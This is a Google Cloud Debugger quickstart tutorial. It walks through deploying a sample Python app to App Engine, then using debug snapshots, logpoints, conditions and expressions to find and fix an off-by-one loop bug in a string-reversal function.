This quickstart shows you how to use Cloud Debugger to debug the state of a simple Python app running on App Engine. This quickstart shows you how to accomplish the following: - Inspect local variables and the call stack - Generate logging statements - Set snapshot conditions and use expressions. In the Google Cloud Console, on the project selector page, select or create a Google Cloud project. Make sure that billing is enabled for your Cloud project. Learn how to confirm that billing is enabled for your project. - Install and initialize the Cloud SDK. - Make sure that the following software is installed on your local system: Deploy sample app to App Engine Start by deploying a Python 3.7 app to App Engine. Clone the app to your local computer: git clone Navigate to the directory that contains the app: cd python-docs-samples/appengine/standard_python3/cloud_debugger Deploy the app to App Engine by issuing the following command: gcloud app deploy When prompted, select the region where you want your App Engine app located. View the app by issuing the following command: gcloud app browse If a browser window does not automatically open displaying the app, click the URL that appears in the terminal. The app contains a prompt to enter a string with the field already prepopulated. Click Submit. You see two results after clicking submit. One is labeled Program Output and shows the output from the Reverse method in the source code. The other is labeled Correct Output and is the output from Python's reverse list functionality. The Program Output and the Correct Output should be identical. However, there's a problem with the source code. Use Debugger to diagnose the issue. View deployed source code After you have deployed your app, you can view the deployed source code on the Google Cloud Console Debug page. Navigate to the Debug page in the Google Cloud Console: Make sure you have the correct project selected: Confirm Debugger has access to the deployed files by verifying that Deployed files is selected and the app's files are present: Make sure the correct version of your app is selected: App Engine maintains all the deployed versions of an app. When using Debugger, verify that you have the correct version of the app selected. After selecting the main.pyfile, you see the following block of code: try: import googleclouddebugger googleclouddebugger.enable() except ImportError: pass import logging logging.basicConfig(level=logging.INFO) This section imports and enables the Debugger agent using a try and except block : try: import googleclouddebugger googleclouddebugger.enable() except ImportError: passThis section configures logging: import logging logging.basicConfig(level=logging.INFO) You are now ready to take debug snapshots and inject debug logpoints to diagnose the problem in the source code. Take a debug snapshot A debug snapshot captures the local variables and call stack that are in scope at a line location. To take a debug snapshot, click the line number that contains the tmpvariable. A blue arrow appears indicating that a snapshot is set, and the results panel displays "Waiting for snapshot to hit." To trigger your snapshot, refresh the page. The Variables pane shows the values of the variables. See that the charsarray was correctly populated on the first pass through the loop. The problem is not present here because the snapshot was taken the first time the breakpoint was hit. The Call Stack pane shows the results of the call stack. You can click on the functions in the Call Stack pane to see the local variables and parameters at that point in the code. When you click on ReverseString, you see that the input was correct. Since taking a snapshot and inspecting the variables and call stack didn't reveal the problem, use logpoints to track down the problem. Inject a debug logpoint A debug logpoint enables you to inject logging into your running app without restarting it. To insert a logpoint, select the Logpoint tab. Click the line number that contains the tmpvariable. An inline text box appears. Populate the fields as follows and click Add: if (True) logpoint("About to swap two characters. Chars is currently {chars}") A logpoint has the following structure: if(condition)logpoint(string). To create a logpoint, you supply two parts: A condition, which must written in the in syntax of the source code. A string, which can contain any number of expressions in curly braces written in the syntax of the source code. To verify that the logpoint has been injected successfully, select the Logpoint History tab. To trigger the logpoint, refresh the page. To see the logs generated by the logpoint, select the Logs panel and click refresh refresh. Diagnosing the issue The logpoints indicate that the while loop executes three times, but it only needs to execute two times. Since the logpoint is set at the beginning of the loop, it logged that it was about to swap characters on a string that was already fully reversed. To pinpoint the problem, use a debug snapshot with a condition. Take a debug snapshot using a condition The app uses the left variable and right variable to track when to stop swapping values. When the left variable is greater than the right variable, the loop should terminate. Snapshots can be set to trigger based on a condition in the source code. Since you know when the loop should terminate, use a snapshot with a condition to isolate the problem. To determine why the loop executes too many times, set the snapshot to trigger on the following condition: left > right. Then click the camera icon camera_alt to prepare Debugger for the snapshot. Trigger the snapshot by refreshing the page. The Variables pane shows that the leftvariable is greater than the rightvariable. Since the leftvariable is already greater than the rightvariable at this point in the loop, it means that as the loop continues, it will swap the values one more time before it reaches line 50 and exits the loop. Take a debug snapshot using an expression Debugger also lets you retrieve programming-language expressions when the snapshot is triggered. For example, you can retrieve the values in the chars array with expressions like chars[1] and chars[2]. To get the value of an expression when a snapshot is triggered, write the expression in the Expression field. You can enter multiple expressions. After the snapshot triggers, the expression values appear above the Variables pane. Fixing the issue Snapshots and logpoints help diagnose the problem in the app. In this example, the while loop executes too many times because the statement that stops the loop, if left >= right: break is reached too late to stop the last iteration. To fix the problem, move if left >= right: break from line 50 to line 47. Clean up To avoid incurring charges to your Google Cloud account for the resources used on this page, follow these steps. What's next Learn more about setting up the Debugger Learn more about using the Debugger Read our resources about DevOps and explore our research program.
https://cloud.google.com/debugger/docs/quickstart
CC-MAIN-2021-49
refinedweb
1,179
63.29
HR14aCompromise From W3C Wiki See also TagIssue57Home This proposal (see TagIssue57Responses) is designed to make everyone equally happy and everyone equally unhappy. Work in progress - still working out the details. JAR's work on this proposal is suspended on the basis of an assessment that a prohibition on sameAs will be rejected out of hand by the "no longer implies" proposal signers. Synopsis There is a weakly specified relationship between what a URI refers to and the generic resource at that URI. This lets URIs be used in different ways in different situations. The weak constraint on the relationship is strong enough to get predictable behavior when one wants to be clear, by talking about the "landing page", while leaving the URI itself free for other uses. When one is not clear human judgment may be required to interpret the URI. This is really an approach to creating proposals for interoperable use of hashless http: URIs, not a proposal in itself. It provides constraints without particular guidance. See the bottom of the page for thoughts on how to develop. Generic resources Assume anything like TimBL's or JAR's or Pat's theory of what is accessed using a URI. If accepting this premise holds you up please let me know and I can tighten it up (at least in the RDF case). To avoid the AWWW baggage I'm not calling them "information resources" but it may end up that that's a better term. Maybe "time-varying information" or "variable information". For each retrieval-enabled hashless http: URI (REHU) assume there is a generic resource, written functionally at the meta-level GR(U) where U is a REHU, whose representations/instances/encodings are the representations retrieved using that URI. I believe this is a safe assumption. There is no assumption that GR(U) is identified either by U or by any other URI. The resource to landing page map We introduce a new URI w:landingPage whose meaning is mostly uninterpreted (left up to human judgment) except for the following: Call an RDF interpretation (see RDF Semantics) "conforming" (to this proposal) if it satisfies the following constraints: - For each REHU U that is interpreted, w:landingPage relates the interpretation of U to GR(U) (which can probably be made rigorous, let me know if this catches you up) - w:landingPage as a property is functional, i.e. every resource identified in this way has a unique associated landing page (possibly but not necessarily itself). If you know what the URI refers to you can recover GR(U). The interpretation can be further constrained by statements in the graph as per the usual RDF (or OWL) semantics. To the extent it is unconstrained human judgment may be required for correct interpretation. If w:LandingPage were not functional, there would be no way to relate resources to particular landing pages. E.g. if Chicago had two landing pages you would have to use a string-valued property like contentUri to refer to the landing pages; you could not relate a particular landing page unambiguously to Chicago. We may want an additional constraint on interpretations that RDF URI references that are provably equivalent according to the HTTP and URI specs must be interpreted the same, but this is a detail. Proposal 25 suggests a Document: link header expressing the same relationship. The Content-location: has also been suggested as a way to express this, but JAR opposes this since if GET U yields Content-header: Q then GR(Q) is not necessarily equal to GR(U), and what we need is a way to refer to GR(U), not GR(Q). Although this is very similar to 'describedby' in the 'no longer implies' proposal, 'describedby' has the wrong name and semantics for the relation since not every landing page would describe anything at all, much less specifically what its URI would be known to refer to. It's hard to imagine what the landing page of a non-describing GR would be, other than itself. This situation is very different from 303, where one can generally assume you get a useable description. The choice of URI is up for grabs. w:landingPage is just a placeholder and the namespace w: is TBD. It is inappropriate in that in common use the landing page for X is usually distinct from X, whereas here a GR can be its own landing page. Other names I considered: genericResource, doppelganger. HTTP consistency The HTTP protocol talks about the representations of the identified resource. These are the 200 responses to GET requests. The idea of this proposal is that the representations of the landing page are the same as the representations of the identified resource, even when they are different resources. The identified resource has no representations that are not representations of the landing page. It is through this gimmick that consistent identity with HTTP is maintained. If w:landingPage were not functional, the identified resource could have representations coming from one URI that were not representations coming from a different URI, and trying to reflect identities back down from the RDF level to the HTTP level would result in incorrect answers to the question "is Z a representation of the identified resource". HTTP sometimes talks about other properties of the identified resource, such as where it is located. These properties also have to be consistent if a URI is to identify "uniformly" i.e. to have the same identities and nonidentities at both the HTTP level and the RDF level. See the HTTP consistency use case. Discovery This relates to the question "the landing page may describe zero, one, or many things, so which of the many things described, or other things that happen to be at hand such as the landing page itself, is meant?". This is already underspecified by the proposal, and the point is to make the mapping a matter of interpretation influenced by representation provider choice and evolving community ideas. But it is desirable to posit a consistent mapping from landing page to thing so that there is a feeling that some rule is being followed permitting discovery of identity from retrieved content (the discovery principle). Unfortunately under most proposals the same generic resource might have to serve as the landing page for two or more resources, depending on, say, which URI it came from. That is, to implement distinct URIs for the various things described (e.g. the statement '<U> describedby <V>.' describes both <U> and <V>), set up several URIs as HTTP level aliases for the same GR, and distinguish their referents based on what that GR says differentially using the various URIs. It may be necessary to say that the URI is the only other thing the "identification" mapping is supposed to depend on. But expressing this as a constraint on RDF interpretations doesn't work, since by the time we talk about the property, the URIs have been lost and all we have is domain elements. We would have to preserve the URI itself as a property of the landing page (removing the possibility of aliases between resources), which would be very ugly. We will consider this disambiguation to be in general a lost cause, but see below. The following may be the tightest constraint we can get away with: - For an interpretation to be conforming, whenever x and y are related by the w:landingPage property, either x=y or x is related to y via wdrs:describedBy. with the observation that nothing requires wdrs:describedBy to be functional. Reference to content use case This is the case where you're writing a message or document and you want to refer to GR(U) for some REHU U. Alternatives: - Use the URI and hope that whoever's interpreting your graph also assumes <U> w:landingPage <U> - This will be fairly obvious if the representations at U contain this statement - It should also be clear (to human judgment) if the representations don't seem to describe anything in particular - It should be clear if the representations are evidently self-describing - It should be clear if the representations are equivalent to serializations of RDF graphs and the graphs don't contain <U> - A Link: header could provide this information - Use the URI and explicitly say <U> w:landingPage <U> in the same message or document, then hope that others will not use the URI differently - This is a good bet if you're the one controlling representations at the URI and can insert a declaration - Pretty good bet if there is no other reasonable interpretation (see below) - Use a local hash URI or tag: URI and define it, e.g. <#doc> where <#doc> w:landingPage <U> - Use blank node notation similarly [w:landingPage <U>] Reference to something described use case This is the case where you want to refer to something described by the representations retrieved from U. If the representation might describe any of several different things this gets a bit dodgy, but let's assume what's described is clear. There are two common modes of description: either the representations use the URI to refer to something (i.e. they describe <U> by incorporating statements whose subject is written <U>), or there is some obvious primary topic. - Use the URI and hope the intent will be clear - It will be clear if representations contain an explicit declaration such as the below - It will be fairly obvious if representations contain lots of statements whose subject is <U> - Maybe it will be clear in cases like Amazon page URIs referring to books (depending on who you talk to) - The representation provider could help make it clear using a Link: header per below - Use the URI and explicitly say <U> wdrs:describedby [w:landingPage <U>] (with local hash URI or tag: URI as alternatives to blank node), or similar with foaf:primaryTopic (but be careful if multiple things seem to be described, or if primary topic could be more than one thing) - If that's annoyingly long let's define a new property that's the composition of the two (this property could be used in Link: too) - Use the URI and explicitly say <U> wdrs:describedby <V> where V is covered by these considerations - Use the URI and explicitly say <U> wdrs:describedby <V> where <V> w:landingPage <V> seems likely based on its being on the right-hand side of a wdrs:describedby statement It would be nice if <V> w:landingPage <V> were a consequence of <U> wdrs:describedby <V> as in the "no longer implies" change proposal, but I'm afraid it doesn't logically follow, it's only highly likely. We could try to retroactively shoehorn this into the semantics of wdrs:describedby, or (better) we could define a new property that entails it. Reference to self-describing content - Use the URI and hope it will be clear (since you will probably get the right answer under either of the two plausible interpretations, although it gets dodgy with, say, Moby Dick) - Use the URI and explicitly say either, or ideally both, of <U> wdrs:describedby <U> and <U> w:landingPage <U>. Consequences for linked data <U> rdf:type :Earthquake now becomes plausible even when U is a REHU. To implement a functional w:landingPage one must be prepared to map from resources (however they are modeled) back to a unique landing page. This is usually pragmatically easy since you know the URI (you are using it to refer to the resource) and you can recover GR(u) from the URI. But if a resource is named by two REHUs, it will not be possible to decide which landing page to pick, since the URI has been lost by that point. Since the relation is functional, it becomes incorrect to say (or imply) <U> owl:sameAs <V> if U and V are both REHUs and GR(U) not= GR(V). This requirement would be met by a UNA (unique name assumption) but is slightly weaker. If e.g. <U> rdf:type :Earthquake and <V> rdf:type :Earthquake and <U> owl:sameAs <V>, then either the content has to be equivalent, or members of class :Earthquake need to be interpreted not exactly as people but as "views" or "profiles" on people, or people "according to" some authority. People engage in this kind of substitution (metonymy) all the time without getting confused, and in the case where machine inference is desired it is possible as an option to be clear and avoid such confusions. One way to get aliasing (sameAs) might be to use a 302 or 307 redirect. This limitation on owl:sameAs is the price you are asked to accept, in exchange for the benefit of being able to use 200 instead of 303. Of course if you wanted to you could still write owl:sameAs where it is incorrect in order to achieve some end; but it would be wrong, i.e. nonconforming. Maybe this is OK since most uses of owl:sameAs in RDF are already nonconforming to the OWL spec. Comparison with "no longer implies" NLI doesn't require describedby to be functional, i.e. it allows multiple landing page for the same thing. So a blank node that's a describedby target can't be used to designate a particular landing page. NLI just says that the target of a describedby is an information resource. The implication is that you can use the IR's URI to refer to the IR, but this conclusion, while sort of reasonable, doesn't logically follow (and seems to be contradicted by the existence of IRs that are not their own landing pages, such as the Flickr example, or Crossref DOIs as they used to be served, with 302). The present proposal improves on NLI: - by allowing determination of a particular landing page for a URI (as opposed to an ambiguous reference) - by giving a way to reliably refer to documents that don't describe anything (which obviously can't be done using describedby). [w:landingPage <U>] is similar to [w:contentUri "U"] from some of the other proposals. Possible mitigation We could standardize a new equivalence relation (property) that is similar to owl:sameAs but considers equivalent things that are the same other than that they're described on different web pages. Then those currently using owl:sameAs could just switch to the new property, inference engines could be retooled to effectively alias the two (which ought to be easy), and we're done. In fact many uses of sameAs are logically incorrect and switching from sameAs to a new predicate could help protect data from more aggressive inference engines. How to turn this into a useful agreement Some URIs could identify compatibly with HR14a, via either an opt-in or an opt-out scheme. This would be the case if a resource is its own landing page: <U> w:landingPage <U>. Otherwise, there are (at least) three general tacks one could take. A single URI is associated with up to three resources: a landing page, what the landing page is about (call that X), and what the URI identifies (<U>). What's needed is a consistent interpretation, in tandem, of <U>, and the property being used to assert something about the interpretation of the URI, e.g. <U> :bestFriend [foaf:name "Patrick Winston"]. First note that any interpretation has to assign a unique landing page to <U>. That is, <U> cannot have two different landing pages. The representations (sensu HTTP specification) of <U> are the representations (sensu "information resource" encoding) of the landing page. Given that here are some possibilities (probably not an exhaustive list): - <U> is the document, and :bestFriend is interpreted as relating <U> to Patrick Winston by composing <U>'s relation to X with X's relation to Patrick Winston. (This would actually be HR14a in disguise.) - <U> is X, and :bestFriend relates X to Patrick Winston. - <U> is a "chimera" i.e. a synthetic entity that has some properties of the landing page and some properties, e.g. :bestFriend, of X. Any of these interpretations would be consistent with this proposal. A particular realization of the proposal might or might not care to encourage one of the three interpretations over the other, e.g. by standardizing on the use of some ontology or set of annotations whose documentation would favor on of the interpretations. See also - Handy diagram - HTTPURIUseCaseMatrix - When owl:sameAs isn’t the Same Redux: A preliminary theory of identity and inference on the Semantic Web, by Halpin, Hayes, and Thompson. in PROCEEDINGS OF THE WORKSHOP ON DISCOVERING MEANING ON THE GO IN LARGE HETEROGENEOUS DATA 2011 (LHD-11)
http://www.w3.org/wiki/HR14aCompromise
CC-MAIN-2013-48
refinedweb
2,792
54.76
03 August 2010 23:59 [Source: ICIS news] LONDON (ICIS)--Third quarter contract prices in the European polybutylene terephthalate (PBT) market were up by €0.05-0.10/kg on the low end due to an increase in feedstock butanediol (BDO) prices and continued healthy demand, sources said on Tuesday. Prices were assessed this week between €2.45-3.45/kg ($3.22-4.54/kg) FD (free delivered) NWE (northwest ?xml:namespace> Filled grade PBT was assessed at €2.45-2.65/kg, an increase of €0.10/kg from previous levels. Prices for unfilled grade were pegged at €2.50/kg, up €0.05/kg from second-quarter values. Flame retardant contract prices for the third quarter were up €0.10/kg at €3.10/kg but unmoved on the high end. The increase in values had been expected by both buyers and sellers given the current inflated costs of feedstock BDO and the healthy demand from the automotive industry, which is the key downstream market for PBT. Sources spoke of continued firm demand which has, despite the summer months, remained solid. “Demand is quite strong and I, personally, don’t expect us to have a slowdown this year,” a trader said. ($1 = €0.76) For more on PBT
http://www.icis.com/Articles/2010/08/03/9381868/europe-third-quarter-pbt-rolls-up-0.05-0.10kg.html
CC-MAIN-2014-15
refinedweb
211
77.74
SAP ABAP - Domains The three basic objects for defining data in the ABAP Dictionary are Domains, Data elements and Tables., MATNN and MATNR_D, and these are assigned to many table fields and structure fields. Creating Domains Before you create a new domain, check whether any existing domains have the same technical specifications required in your table field. If so, we are supposed to use that existing domain. Let’s discuss the procedure for creating the domain. Step 1 − Go to Transaction SE11. Step 2 − Select the radio button for Domain in the initial screen of the ABAP Dictionary, and enter the name of the domain as shown in the following screenshot. Click the CREATE button. You may create domains under the customer namespaces, and the name of the object always starts with ‘Z’ or ‘Y’. Step 3 − Enter the description in the short text field of the maintenance screen of the domain. In this case, it is “Customer Domain”. Note − You cannot enter any other attribute until you have entered this attribute. Step 4 − Enter the Data Type, No. of Characters, and Decimal Places in the Format block of the Definition tab.. Step 5 −. Step 6 − − Activate your domain. Click on the Activate icon (matchstick icon) or press CTRL + F3 to activate the domain. A pop-up window appears, listing the 2 currently inactive objects as shown in the following snapshot − Step 8 − At this point, the top entry labeled ‘DOMA’ with the name ZSEP_18 is to be activated. As this is highlighted, click the green tick button. This window disappears and the status bar will display the message ‘Object activated’. If error messages or warnings occurred when you activated the domain, the activation log is displayed automatically. The activation log displays information about activation flow. You can also call the activation log with Utilities(M) → Activation log.
https://www.tutorialspoint.com/sap_abap/sap_abap_domains.htm
CC-MAIN-2019-09
refinedweb
308
65.83
» JSF Author richfaces Process Bar (progress bar) Suresh Khant Ranch Hand Joined: Feb 27, 2010 Posts: 114 posted Mar 17, 2010 03:18:04 0 Hi All, I am trying to implement progress ( process ) bar example which i need it to my interface , I have just copied the example in the richfaces site. what i want is that once the user clicks on the button it should call a method which will take some time to finish the processing , while the processing is going , I just want to display a message indicating that there is some process going on . in the code below once i click on the button it will call the method "processSomething" from mehtod"startProcess" and after finishing processing in this method , it show the processing bar which is not what i want. it should show the processing bar while the processing is going on in the method "processSomething". any one can help me to fix this issue here is the code: <ui:define <h:form> <a4j:outputPanel <rich:progressBar <f:facet <br /> <h:outputText <a4j:commandButton </f:facet> <f:facet <br /> <h:outputText <a4j:commandButton </f:facet> </rich:progressBar> </a4j:outputPanel> /** * */ package com.lit.message.backoffice.web.bean; import java.util.Date; /** * @author techbrainless * */ public class ProgressBarBean { private boolean buttonRendered = true; private boolean enabled=false; private Long startTime; public String startProcess() { setEnabled(true); setButtonRendered(false); setStartTime(new Date().getTime()); processSomething(); return null; } public Long getCurrentValue(){ if (isEnabled()){ Long current = (new Date().getTime() - startTime)/1000; if (current>100){ setButtonRendered(true); }else if (current.equals(0)){ return new Long(1); } return (new Date().getTime() - startTime)/1000; } if (startTime == null) { return Long.valueOf(-1); } else return Long.valueOf(101); } public boolean isEnabled() { return enabled; } public void setEnabled(boolean enabled) { this.enabled = enabled; } public Long getStartTime() { return startTime; } public void setStartTime(Long startTime) { this.startTime = startTime; } public boolean isButtonRendered() { return buttonRendered; } public void setButtonRendered(boolean buttonRendered) { this.buttonRendered = buttonRendered; } public void processSomething(){ //process something .., which requires some time } } Tim Holloway Saloon Keeper Joined: Jun 25, 2001 Posts: 14456 7 I like... posted Mar 17, 2010 06:23:08 0 That's not going to work. An HTTP request doesn't return anything at all until all the code in the request handler has completely finished processing. So you'd get a long delay and then 100%. To get a progress display, you're going to need to run the long-running display in a separate thread, start the thread in you backing bean, then return to the caller, leaving the thread to run. You also need to make sure that the thread you start isn't tied to a transient object like a servlet request or you'll run out of HTTP request processors. Traditionally, I've simply set up what I call a "null servlet" whose init() method launched a thread engine which could be petitioned to run the threads on its own resource structure. Customer surveys are for companies who didn't pay proper attention to begin with. I agree. Here's the link: - it saves me about five hours per week subject: richfaces Process Bar (progress bar) Similar Threads rich tabpanel : first rich tab not loaded with focus with first tab richfaces modal panel perfromance How to integrate progressBar in my project Clearing h:inputText value Validation Problem ... again! All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter JForum | Paul Wheaton
http://www.coderanch.com/t/487581/JSF/java/richfaces-Process-Bar-progress-bar
CC-MAIN-2013-20
refinedweb
569
51.68
. PREVIOUS | NEXT Nov 08 2017, 9:04 PM. PREVIOUS | NEXT Nov 08 2017, 9:03 PM In the last section, you learned all about how to create the design files that will bring your project from just a figment of your imagination all the way to a working prototype and then into a design that is ready to be manufactured. In this section, I will give you an overview of the process to take those design files to market. Step 6: Manufacturing Prototypes to Production If you have made it this far, you have a design file that represents the PCB artwork to be laid out in copper. This is where a real board is finally created from all of your careful planning and months of researching, breadboarding, and designing. You have many options to turn that artwork into a real, physical board and then assemble that board with real components. Manufacturing Terminology Manufacturing Options By Phase The first PCB’s that you bring up will not be perfect. You will not go straight to production. Despite all of your hard work in schematic and layout, you will fail to connect everything perfectly. It is highly recommended to build just a few boards in the first batch and then bring up just those few to ensure that the artwork is correct before ordering thousands upon thousands more. Then, a pilot build will help hone your process for the onslaught of thousands or even millions of boards. Do you want to find out that your process is broken after you have developed 100 boards or one million boards? Manufacturing Phase PCB Manufacture Options Assembly Options Prototyping · DIY laser printer & etching · Circuit Printers · Quick-turn board shop · DIY Toaster oven and hand-soldering · Prototype assembler Pilot Volume · Domestic vs. foreign board shops · Domestic vs. foreign assemblers · Self-purchase parts, distributor, or assembler purchase Prototyping Manufacturing Phase – DIY Options The very first time you build a PCB for a new design, the quickest and cheapest way to get it done in very low volumes is to simply do the work yourself. There is some upfront investment in tools that has to be made, but you can continue to use those tools for future projects. There is also a real risk that you will do things improperly and create your own headaches. It depends on how willing you are to learn a new skill and take a risk that you could end up wasting your time and effort. Old-School Board Etching In order to build the PCB yourself, you have some options. The old-school way to build your own board was to purchase copper-clad circuit board blanks, lay plastic traces on the board, and then etch away the exposed copper using a powerful and toxic etching solution. This method is fine as long as you have large pin pitch components. It won’t work for today’s modern 1/2 mm pitch components. Hand-drawn circuits with marker and etching kit Laser Printer Board Etching To reach a finer degree of precision, a laser printer can be used to print the Gerber artwork from a CAD program on special transfer paper, available from PulsarFX as a PCB Fab-in-a-Box kit. A laser printer’s toner is essentially powered plastic that is fused to the paper. By fusing the toner to transfer paper, the idea is that you can reheat the toner and it will release from the transfer paper onto your blank copper circuit board, which is part of the kit. You will need a high-temperature laminator, and it can be tricky to find one that works just right. In my experience with this method, it was a little spotty. Thankfully, you can trace over any incomplete traces with an ordinary marker pen, and that will help resist the etching compound from removing the copper at the gaps in the traces. However, you lose some of the precision that was gained by the laser printer process. In order to create a multilayer board, you must print out each layer and etch it separately, and then glue the layers together. Then, you have to drill through any of your through-holes or vias and make a connection between the layers with solder. With enough practice and experimentation, this method can be successful. Laster printed etch resist and final product with SMT LEDs Direct Circuit Printer A recent invention in circuit board prototyping is the circuit printer. There are many exciting developments in this area that will surely produce useful tools for your prototyping work in the near future. Some notables to check out are: Cartesion Co’s Argentum and the soon-to-be-produced 3D circuit printer from Voltera. The big concern that I have for these devices in the near term are with fine pitch devices. Argenutm and Voltera Circuit Printers Quick-turn PCB Services The best choice for many makers even with these available DIY choices is to simply order a quick-turn board from a board shop. They can be found with very reasonable prices and ship the boards in a few days. You can still assemble the board yourself, which is where you will get more value. Ordering Parts However you acquire your PCB, the next step in the DIY process is to assemble the board. Before you can do that, you have to source the parts. This is a time-consuming activity. It is nice if you can find all of your parts from a single vendor, but often you will have to order from several and coordinate shipping so that you aren’t waiting on a single part to start your build. You can’t start meaningful assembly until all of the parts arrive. When ordering parts, be prepared to make decisions that you never had any idea that you would need to make. You may know the exact major electronic components you will be ordering, but there are a collection of supporting components that need to surround those major components. You will find that there are many more types of resistors, capacitors, crystals and other miscellaneous parts that have a million variants. You have to specify things like brand, package, size, value, tolerance, material, lead or no-lead, temperature, wattage, operating voltage, etc., when all you want is a 1µF capacitor! Your parts arrive packaged in little antistatic baggies or boxes. Now you have to match up each one of those components to a refdes on the schematics and formulate a plan. I line all my baggies up in a shoe box in the order that I will apply them to the board and prepare notes for myself so that when the assembly starts, I don’t forget what I am doing. If you are planning to have your boards assembled by an outside company, you can save money by ordering the parts yourself. Assemblers will charge a markup on any of the parts they order on your behalf. Just be sure to ask your assembler what kinds of machines they will use so that you get the right kind of packaging. An automated “tape and reel” machine requires that your parts are delivered in that fashion. If you don’t order a full reel of parts, can your assembler accept “cut tape” parts that have been cut off of a reel? Parts ready for assembly SMT Board Assembly You can assemble your SMT board yourself with the help of a toaster oven and solderpaste. If you had your PCB developed by a board shop, you have the option to order a stencil for the solderpaste. They are laser cut, and you can use this to spread solderpaste across the board, laying it down only on the areas where a component pin will land on a pad. You can get by without a stencil, but there is a higher chance of solder bridges, which are bits of solder that connect adjacent pads. Solderpaste needs to be kept refrigerated, and you only have an hour or so before the solderpaste becomes a liquid, although it depends on the temperature of the room. I have extended it to a few hours with no issues. The hardest part of placing components by hand is to get them to land on the solderpaste cleanly, and then not bumping them when you are placing nearby components. Solderpaste on a board and then the parts are placed and baked Oven Baking Commercial SMT ovens bake the boards using a precise temperature profile to ensure that all of the solder melts and you don’t cook your components too long. You can purchase a home SMT oven for a few hundred dollars, which includes the temperature profile. It’s all automatic, which is great. I have only used a regular toaster oven from a household store. The directions that I found online were to simply insert the board in the oven, crank the temperature to 400 degrees, then watch for the solder to melt. The grey solderpaste becomes shiny silver when it melts. You can watch this process happen through the window of the toaster oven, as the temperature washes over the board, in my case from the corners inward. Once all of the solder turns silver, you wait about 15 seconds more and then remove the board from the oven. There is risk with this method of some cold solder joints, and you will have to touch up any solder bridges you find with flux and a fine-tipped soldering iron. Use a 10x microscope if you can find one, and look for issues. Take your time. It is better to find the problem now than when you power up or your board or debugging a software issue. Use a multimeter to check for shorts between power and ground and between traces that are hidden. I have been able to get several good boards out of this process in the first and only time that I tried it. Your mileage may vary. Prototype/Pilot Manufacturing Phase – Outsource Vendor Option The low-volume board development process is not cheap nor fast. If you want it fast, prepare to spend a lot more. Quick-turn PCB builds can be done for a premium in 24 hours, if you are on a tight schedule. Things get a lot more affordable as you approach a 5-day turn, and become most affordable at a 2-week turn. You will have to quote the boards in many different volumes because you may be surprised to find that building 100 boards isn’t ten times as expensive as building 10 boards. It can be just twice as expensive, for example, and may be worth it to get as many prototype boards as you need for your testing purposes. When you receive your prototype boards, the first thing to do is a visual examination to look for copper traces that may be touching where they are not supposed to be touching. You will need to refer to Gerber files and layout to compare the real PCB to the design files. Measure a few points with a micrometer. Once the board passes visual checks, you can probe the board with a Volt Ohm Meter (VOM) and ensure that there is no short circuit between the power and ground pins of any device. This is heartbreaking if you find it, because it can be hard to trace back where the error occurs. All vias pass through any internal power and ground planes, and if there was not sufficient anti-pad clearance inside those layers around all vias, you could get a power and ground short. You will need to then check every signal versus power/ground to find the offending signal. If you pass that check, you can then measure to ensure that all signal traces don’t short against power or ground. If you find that all of the boards check out, move on to the assembly step. The assembly of your electronic components onto a low volume of prototype boards can be very expensive if completed by a prototype assembler vendor. Be prepared for some pricey quotes! To make matters worse, the prototype assemblers are not in control of the schedule. They have large repeat customers that will knock your product to the back burner no matter what they may have quoted you regarding turn times. A fast turn time for the assemblers is five days. It takes time for the assembler to examine the BOM, order the parts, receive the parts, configure the tape-and-reel machines (if used for your volume order), find pin #1 on all devices in your silkscreen and layout files, and then do hand soldering touch ups after your boards have been run through the automated assembly process. You may not have a test procedure for the prototype builds, but it would be helpful to define manufacturing tests by the time the pilot builds occur. The pilot builds are meant to test your process against a larger volume of manufacturing that will follow. Volume Production Manufacturing Phase When moving from pilot builds to manufacturing builds, you biggest concern will be cost. You certainly don’t want to pay the pilot build prices or you will go broke. You must choose between domestic and foreign assemblers and board shops, keeping in mind the tradeoffs between cost, language barriers, shipping charges, and travel abroad to fix issues. Some assembly shops have domestic pilot lines with foreign volume lines, and those can be a good choice because their teams already work together. This phase is more about business strategy than engineering, and approaches will vary greatly between developers. That’s the big picture overview of what lies ahead if you plan to bring your own gadget to market. In the last section, we built a software driver for the TI TLC5940 LED driver and used it to illuminate some test LEDs. We also figured out how to debug the driver with the help of the Simplicity Studio tools. In this section, we will create some data structures to make it easier to work with named colors, and then improve that driver to make use of the DMADRV library. This library allows us to more easily develop code that invokes the DMA peripheral. Setting Specific Colors We can develop some helper functions to turn on individual colors per LED driver channel and a color mixer to create standard blended colors such as purple. typedef struct color_code_bits { uint8_t red; uint8_t green; uint8_t blue; } color_code_struct; #define WHITE { 0xFF, 0xFF, 0xFF } #define RED { 0xFF, 0x00, 0x00 } #define GREEN { 0x00, 0xFF, 0x00 } #define BLUE { 0x00, 0x00, 0xFF } #define PURPLE { 0xFF, 0x00, 0xFF } #define YELLOW { 0xFF, 0xFF, 0x00 } #define ORANGE { 0xFF, 0x0F, 0x00 } // Sets the color in memory but does not write it void set_color_buffer(uint8_t led_number, color_code_struct color) { const uint8_t ch0 = led_number * 3; const uint8_t ch1 = ch0 + 1; const uint8_t ch2 = ch1 + 1; // Shift the 8-bit RGB code over by 4 to get to 12 bits of GS stream.channel[ch0].grayscale = (uint16_t) (color.red << 4); stream.channel[ch1].grayscale = (uint16_t) (color.green << 4); stream.channel[ch2].grayscale = (uint16_t) (color.blue << 4); } These functions can then be used to set whatever color codes we want per channel, like purple/yellow/purple: const color_code_struct purple = PURPLE; set_color_buffer(0, purple); const color_code_struct yellow = YELLOW; set_color_buffer(1, yellow); set_color_buffer(2, purple); // Now send the stream to the TLC5940 stream.mode = GRAYSCALE_MODE; // Now write the GS data write_serial_stream(); This resulted in a nice purple color on the first and third LED, but the yellow LED had a bit of a greenish tint. Likewise, setting all colors to 0xFF resulted in a blue-ish white. It seems necessary to compensate for the relative brightness of each color LED in the RGB set to get the blended colors just right. Introduction to Direct Memory Access (DMA) We used DMA in the last chapter with the help of the SPIDRV library, but we didn’t have to program anything in the DMA engine ourselves. We could use SPIDRV again here, but instead we will learn another way to set up DMA ourselves so that we gain a deeper understanding of how it works. The DMA peripheral is a highly-configurable tool that moves data from one place to another, and it does so without help from the MCU once the transfer is started. This allows the MCU to sleep or do other things. There are multiple channels available to perform multiple transfers between different sources and destinations. The DMA transfer can be triggered through many sources and generates an interrupt when it is done moving the data. It is a simple mechanism, but it is sometimes difficult to understand and can be harder to debug than sequential programming. The toughest part is understanding how to set it up. Fortunately, Silicon Labs has provided a DMA driver called DMADRV. To use this driver, all you need to do is include the dmadrv.h file at the top of your source code as well as copy the required files from the 